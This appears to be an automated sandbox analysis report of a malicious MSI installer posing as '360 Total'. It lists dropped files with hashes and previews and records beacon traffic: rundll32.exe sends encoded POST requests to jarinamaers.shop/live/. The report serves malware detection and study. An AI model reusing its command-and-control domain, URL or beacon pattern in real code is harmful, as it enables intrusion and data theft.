                                                                                  SHA1:F6C31C9CD832AE2AEBCD88E7B2FA6803AE93FC83
                                                                                  SHA-256:1E0E63B446EECF6C9781C7D1CAE1F46A3BB31654A70612F71F31538FB4F4729A
                                                                                  SHA-512:F6D6DC40DCBA5FF091452D7CC257427DCB7CE2A21816B4FEC2EE249E63246B64667F5C4095220623533243103876433EF8C12C9B612C0E95FDFFFE41D1504E04
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................J......J..5.......................J......J......J..........Y..."......".q............."......Rich....................PE..L....<.a.........."......^...........2.......p....@..........................P......".....@.................................0....................................5...V..p....................X.......W..@............p.. ............................text....\.......^.................. ..`.rdata..XA...p...B...b..............@..@.data....6..........................@....rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.161420248830027
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:JSbX72Fj4iAGiLIlHVRpBh/7777777777777777777777777vDHFXIOQa704pOlN:JNQI5V1IidF
                                                                                  MD5:593098A5C51E0886489C5156CC95BEA3
                                                                                  SHA1:A8C490057A9929DA9FE92E32E7E252CC8225290F
                                                                                  SHA-256:EC05A88F02E8554CB0A8058C99F7BB1D0116E3848EF74FD0A1687F0BB880A101
                                                                                  SHA-512:7345187AF19213E70DE99680329B453D3DA99D05CB6844673A66DA6422D7183E5DC2C4A15C709D756C0922AE6E62B6F5B7635452F223FD9D20230613E155B3F9
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.5870992721407895
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
                                                                                  MD5:19EE7B28192A55CCA8A0D38BFD426B67
                                                                                  SHA1:329D409DC223B54F3FB48312AD3D8D4F46E41979
                                                                                  SHA-256:47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
                                                                                  SHA-512:879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):360001
                                                                                  Entropy (8bit):5.362995403009861
                                                                                  Encrypted:false
                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26KgauE:zTtbmkExhMJCIpE5
                                                                                  MD5:DC0671E0270E9D3BFAF1C3E4103F682B
                                                                                  SHA1:C0530962C022D093DB0A3A89DF07B8CEFF75A5B9
                                                                                  SHA-256:2113781C312B2336A72FA51F0910DE3639090455914938D772D03A52876B4D73
                                                                                  SHA-512:0C9F1B2E5CFF0ADDFC9C5BF021EF60F4A5946D62A29ACD3CE441756E9E67199C9808E7556B569924444E096A69006951B75D6DA75268AB3C3452F61B6414303A
                                                                                  Malicious:false
                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.2706780281553751
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
                                                                                  MD5:80E4FBE13DAEDF4F5EBA198F5388AADD
                                                                                  SHA1:AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
                                                                                  SHA-256:7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
                                                                                  SHA-512:860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):73728
                                                                                  Entropy (8bit):0.145935377982653
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:vOkTxkEsipVkE+kEsipVkEgVAEVkyjCycVgwGpKO2a+1:2kTWS7SqVAEbCycm2a
                                                                                  MD5:BB3783780B83AE55F51EC9C16A68CFC8
                                                                                  SHA1:1302A3E98980FA5E0A2888E13AF6C40B2C4C6A25
                                                                                  SHA-256:27DEDC77DD1C3DA91A1FE017A5E3F8A341AD1201F26965A53BA2F363C159489C
                                                                                  SHA-512:46AA56FDB95D4003F19F79F122BBFB9053D0B8078A506341CF6F45403F8D01F6425E6844FE97C69ABFC1D6F1692ED949FA5E2C56F3105A655DA0B814111AB61A
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.2706780281553751
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
                                                                                  MD5:80E4FBE13DAEDF4F5EBA198F5388AADD
                                                                                  SHA1:AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
                                                                                  SHA-256:7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
                                                                                  SHA-512:860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.5870992721407895
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
                                                                                  MD5:19EE7B28192A55CCA8A0D38BFD426B67
                                                                                  SHA1:329D409DC223B54F3FB48312AD3D8D4F46E41979
                                                                                  SHA-256:47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
                                                                                  SHA-512:879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):1.2706780281553751
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:/XcuskPvcFXOTT5OogSqVAEbCycm27S2TB:vctFOTkogJewCfH
                                                                                  MD5:80E4FBE13DAEDF4F5EBA198F5388AADD
                                                                                  SHA1:AA7C75DFBC1CC59F4623946CBED91D6B18FB8339
                                                                                  SHA-256:7811387710332590D006467E592793E4AAF61B4DDBA95A89D2C6AA56AA820C61
                                                                                  SHA-512:860B466C7E4BB87950C037314BBF445830B9287FB23513C7D62E50F34BBE7E527B87EC832D61B7AF849FF951884625339F294FD97DA83D500EC12C6F953F11C7
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):1.5870992721407895
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:o8PhUuRc06WXOCFT5GgSqVAEbCycm27S2TB:3hU1UFTwgJewCfH
                                                                                  MD5:19EE7B28192A55CCA8A0D38BFD426B67
                                                                                  SHA1:329D409DC223B54F3FB48312AD3D8D4F46E41979
                                                                                  SHA-256:47FF22EBB129DC79C329DAC1326A08901A1AC3298EE50D73461B85A4EB2DB7F7
                                                                                  SHA-512:879C8C136F029B3A0DED7B4D4C98ACD6346DEC2BF241580EC6F6E5CFAD8D25DC4773E15BE97DEF5090EC08CC85B97BFF6DB90282209DCC14F17E86013B59290D
                                                                                  Malicious:false
                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):32768
                                                                                  Entropy (8bit):0.06805445723953887
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:2/9LG7iVCnLG7iVrKOzPLHKOXvZ1UKkwQa70HLIAVky6lO:2F0i8n0itFzDHFXIOQa70uO
                                                                                  MD5:DDFE8FC02F97ED0B140BF8FEE34DBC22
                                                                                  SHA1:23118003F91DD54D01E75F1F22FC417A1F518DB5
                                                                                  SHA-256:47EBE8FB2E1FF000C6FD50F4ED992F9704EBE2816154A8637FEE2F9FCF0A97AA
                                                                                  SHA-512:39D6EEB91688280E34E5DA258220236BEB2A87A7B2EC5FF349CCC42A554863F54CA9DF53C0459B688B8408EF7F13D4083AC520E6B541CD4A347B3185BE2AFBB6
                                                                                  Malicious:false
                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Last Printed: Fri Dec 11 11:47:44 2009, Create Time/Date: Fri Dec 11 11:47:44 2009, Last Saved Time/Date: Fri Sep 18 15:06:51 2020, Security: 0, Code page: 1252, Revision Number: {805E70A6-23C0-4688-BBAF-6F995BB72730}, Number of Words: 10, Subject: 360 Total, Author: HuMaster LLC, Name of Creating Application: 360 Total, Template: ;1033, Comments: This installer database contains the logic and data required to install 360 Total., Title: Installation Database, Keywords: Installer, MSI, Database, Number of Pages: 200
                                                                                  Entropy (8bit):7.152500797895932
                                                                                  TrID:
                                                                                  • Windows SDK Setup Transform Script (63028/2) 47.91%
                                                                                  • Microsoft Windows Installer (60509/1) 46.00%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 6.09%
                                                                                  File name:ad.msi
                                                                                  File size:1'619'456 bytes
                                                                                  MD5:666151c11b7899a0c764abe711d3f9b3
                                                                                  SHA1:35462114e096f4d307607d713136bfe38479870d
                                                                                  SHA256:8041a15e27c785f2adcce9e8c643f5cc619b52e50cd36ff043d13c4089ce1cad
                                                                                  SHA512:835fee905d540f1e3b4d32a0645041c9add6ea488675a8ca99dbe571cfaaef5781bed8c1277dd7942be7d672945d68a1016c2ab5cb645d539e07893d69672adc
                                                                                  SSDEEP:49152:QZH3YuW8zBQSc0ZnSKmZKumZr7A2BQTBG:+Y90Zn0K/A2OF
                                                                                  TLSH:CB75D0227386C537C96E01303A29D66B5579FDB74B3140CBA3C82D2E9EB45C16639FA3
                                                                                  File Content Preview:........................>.......................................................E.......a...............................(...)...*...+...,...-...........A...B...C...D...E...F..................................................................................
                                                                                  Icon Hash:2d2e3797b32b2b99
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 25, 2024 22:44:27.549626112 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.549690962 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:27.550072908 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.585788965 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.585803986 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:27.821343899 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:27.821485043 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.886996031 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.887017012 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:27.887360096 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:27.887722015 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.889792919 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:27.936111927 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:41.950823069 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:41.950954914 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:41.951750994 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:42.907870054 CEST49723443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:42.907895088 CEST44349723104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:44.043658972 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.043694019 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:44.046277046 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.046477079 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.046497107 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:44.276017904 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:44.276137114 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.276793957 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.276802063 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:44.279637098 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:44.279644966 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:52.916255951 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:52.916426897 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:52.916493893 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:52.916522980 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:52.916837931 CEST49724443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:52.916858912 CEST44349724104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:53.083163023 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.083209038 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:53.083292961 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.083606958 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.083617926 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:53.319941998 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:53.320030928 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.323164940 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.323173046 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:53.325628996 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:53.325634003 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.603646994 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.603737116 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.603805065 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.603857994 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.603885889 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.603920937 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.604172945 CEST49725443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.604207993 CEST44349725104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.681261063 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.681315899 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.681384087 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.681682110 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.681698084 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.914426088 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.914499044 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.915143013 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.915153980 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:44:58.917124987 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:44:58.917131901 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:45:09.140057087 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:45:09.140150070 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:45:09.140170097 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:45:09.140232086 CEST49727443192.168.2.6104.21.46.75
                                                                                  Apr 25, 2024 22:45:09.140280962 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:45:09.140412092 CEST44349727104.21.46.75192.168.2.6
                                                                                  Apr 25, 2024 22:45:09.140465021 CEST49727443192.168.2.6104.21.46.75
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Apr 25, 2024 22:44:27.381496906 CEST5987353192.168.2.61.1.1.1
                                                                                  Apr 25, 2024 22:44:27.538635015 CEST53598731.1.1.1192.168.2.6
                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                  Apr 25, 2024 22:44:27.381496906 CEST192.168.2.61.1.1.10xca8cStandard query (0)jarinamaers.shopA (IP address)IN (0x0001)false
                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                  Apr 25, 2024 22:44:27.538635015 CEST1.1.1.1192.168.2.60xca8cNo error (0)jarinamaers.shop104.21.46.75A (IP address)IN (0x0001)false
                                                                                  Apr 25, 2024 22:44:27.538635015 CEST1.1.1.1192.168.2.60xca8cNo error (0)jarinamaers.shop172.67.136.103A (IP address)IN (0x0001)false
                                                                                  • jarinamaers.shop
                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.2.649723104.21.46.754432224C:\Windows\System32\rundll32.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 20:44:27 UTC229OUTPOST /live/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                  Host: jarinamaers.shop
                                                                                  Content-Length: 252
                                                                                  Cache-Control: no-cache
                                                                                  2024-04-25 20:44:27 UTC252OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 72 45 35 76 63 43 2f 48 57 43 62 45 64 32 4e 53 69 43 30 35 68 35 42 7a 42 68 39 43 6e 57 47 65 4e 4a 4d 72 33 37 43 41 75 74 4b 62 31 36 62 4d 4b 37 51 79 67 63 70 65 42 57 4c 55 55 66 73 39 46 6c 6f 50 4d 66 50 75 2b 39 73 4c 38 4b 58 7a 4a 63 68 4f 51 37 7a 4e 71 47 46 76 65 5a 53 63 6a 71 4c 63 4c 76 51 67 4a 47 67 59 57 79 52 47 52 6f 52 6c 6d 53 4e 43 2f 70 35 54 77 48 6d 6e 42 61 6c 43 6c 4e 76 6a 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 61 36 63 6c 46 4b 32 69 34 75 74 78 33 49 55 57 65 54 52 70 4e 39 77 42 56 51 30 31 71 59 6c 65 79 6c 70 4d 43 66 33 62 35 62 51 70 78 79 77 4a 54 69 31 64 76 36 6f 4e 6b 59 79 62 65 6d 6e 4d 53 4b 54 62 2f 69 56 2b 46 34 54 63 2b 54 65 70 50 48 54 42 41 58 47 70 6e 41
                                                                                  Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiC05h5BzBh9CnWGeNJMr37CAutKb16bMK7QygcpeBWLUUfs9FloPMfPu+9sL8KXzJchOQ7zNqGFveZScjqLcLvQgJGgYWyRGRoRlmSNC/p5TwHmnBalClNvj6CW2j80hj8qSvsKa6clFK2i4utx3IUWeTRpN9wBVQ01qYleylpMCf3b5bQpxywJTi1dv6oNkYybemnMSKTb/iV+F4Tc+TepPHTBAXGpnA
                                                                                  2024-04-25 20:44:41 UTC572INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 20:44:41 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BpiWyQnSnDiFI6Iq1IQfphq5i7czMF0QmY5BRiBrYOrp5rV9ya%2FwwGCB72YvhHtFFb1booq0c9qmAZpbt4kZ8H6elPRKRzkMuOQ6uYn9%2BrahNjd8nsx8osPPObzH9nk8k6kz"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 87a12bd32906673e-ATL
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2024-04-25 20:44:41 UTC26INData Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a
                                                                                  Data Ascii: 14QhOmMB2npTVqDJOocQ==
                                                                                  2024-04-25 20:44:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  1192.168.2.649724104.21.46.754432224C:\Windows\System32\rundll32.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 20:44:44 UTC229OUTPOST /live/ HTTP/1.1
                                                                                  Accept: */*
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                  Host: jarinamaers.shop
                                                                                  Content-Length: 184
                                                                                  Cache-Control: no-cache
